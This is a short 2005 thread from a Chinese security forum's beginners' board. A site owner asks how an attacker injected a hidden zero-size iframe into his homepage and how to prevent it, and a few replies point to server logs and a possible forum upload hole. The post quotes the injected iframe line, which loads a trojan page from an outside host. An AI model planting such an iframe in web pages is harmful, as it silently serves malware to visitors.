论坛: 菜鸟乐园 标题: 请教高手一个我认为比较高级的问题! 复制本贴地址    
作者: songinet [songinet]    论坛用户   登录
我的网站首页被人在最后一行加了如下的代码<iFRAmE SRc="http://www.wagou.net/images/pic.htm" width="0" hEight="0"></iFRAmE> 我下载了那个文件打开看是用java写的木马程序不过加了很多空格,我想问的是通过什么漏洞用什么方法能做到在网站的首页加上这么一行代码啊?另请高手指教怎么防范!


[此贴被 songinet(songinet) 在 02月21日10时26分 编辑过]

地主 发表时间: 05-02-21 10:24

回复: Ansty [ansty]   论坛用户   登录
人家入侵了你的站点。维修吧!

B1层 发表时间: 05-02-21 15:12

回复: songinet [songinet]   论坛用户   登录
入侵?我还能不知道是被入侵了啊,哪种方式通过什么怎么入侵的啊,怎么维修啊。

B2层 发表时间: 05-02-21 17:16

回复: 286 [unique]   版主   登录
入侵的方式很多种,你这是被入侵后的结果,就很难判断原因了。
你可以看看C:\WINNT\system32\LogFiles\W3SVC1目录下的文件,看能不能提供一些线索。
一旦入侵成功,修改就简单的多了。记事本也能修改。


B3层 发表时间: 05-02-21 17:19

回复: songinet [songinet]   论坛用户   登录
所有的日志我都看过了,不是直接入侵服务器在本地修改造成的,应该是利用什么漏洞或论坛上传的结果,我只是想问一下有没有人知道有什么漏洞可以这么做的我好有针对的防范

B4层 发表时间: 05-02-21 19:41

回复: hot21cn [hot21cn]   论坛用户   登录
你站是不是有论坛呀.

B5层 发表时间: 05-02-22 02:32

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号